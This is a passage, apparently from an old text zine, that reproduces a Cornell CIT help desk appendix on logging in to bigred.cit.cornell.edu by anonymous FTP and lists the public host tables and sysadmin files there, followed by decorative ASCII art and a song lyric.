	CIT Service Help Desk
	124 CCC
	8am - 6pm Mon-Fri
	5-8990
	SHDX@cornellc


Appendix A: anonymous ftp to bigred.cit.cornell.edu

1.	Type:

ftp bigred.cit.cornell.edu

	at your system prompt.  If name resolving is not set up type:

ftp 128.253.180.2

2.	The system asks you to identify yourself. Type:

anonymous

4.	The system asks you to enter a password. Type your userid.

	When you are connected to bigred.cit.cornell.edu, type help to see a 
list of available commands.

The following is a subset of the files available on bigred in the ~ftp 
directory.

README	An index file, more complete than this list.
pub/	Public  directory
pub/hosts/	Public hosts directory
pub/sysadmin/	Public system administration directory

pub/hosts:
hosts	Standard /etc/hosts
hosts.BIND	/etc/hosts with fully qualified names listed first
hosts.txt	The NIC host table
hosttable.txt	Combined NIC and Cornell host table
localhosts.txt	Cornell host table
localnetworks	Some Cornell networks (mainly 128.84 nets)
networks	NIC and COrnell networks


pub/sysadmin:
ECE.request	Template for IP address requests on the Engineering College 
	Ethernet.
fetchhosts.tar	Some scripts to automaticly fetch these files
libc.README	README for SUNOS (Sun4c) shared libraries with the 
	resolver built in.
libc.so.1.6.2	SUNOS (Sun4c) shared libraries with the resolver built in.
libc_resolv.so.sun3.Z	SUNOS (Sun3) shared libraries with the resolver built in.
nameserver.tar	How to set up a name server
newhost.template	Template for IP address requests
security-doc.tar	Security info for Unix systems (mainly Suns)
security-doc.txt	Security info for Unix systems (mainly Suns)
sendmail.cf	Sendmail.cf that works on Cornell's campus.
xntp.tar	Network Time protocol software

    ----------------------------
    ----- Le mot 2 la faim -----
    -------------------------15-




^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                   ~-_-~ 
                 T   o  o   T 
                      ^ 
                  (   O   ) 
                    ------ 
                  I'll be back ! 

                           -.                       .-
                       _..-'(                       )`-.._
                    ./'. '||\\.       (\_/)       .//||` .`\.
                 ./'.|'.'||||\\|..    )o o(    ..|//||||`.`|.`\.
              ./'..|'.|| |||||\`````` '`"'` ''''''/||||| ||.`|..`\.
            ./'.||'.|||| ||||||||||||.     .|||||||||||| ||||.`||.`\.
           /'|||'.|||||| ||||||||||||{     }|||||||||||| ||||||.`|||`\
          '.|||'.||||||| ||||||||||||{     }|||||||||||| |||||||.`|||.`
         '.||| ||||||||| |/'   ``\||``     ''||/''   `\| ||||||||| |||.`
         |/' \./'     `\./         \!|\   /|!/         \./'     `\./ `\|
         V    V         V          }' `\ /' `{          V         V    V
         `    `         `               V               '         '    '

                   "And all the girls says I'm pretty fly for a whyte guy" (The Offspring)
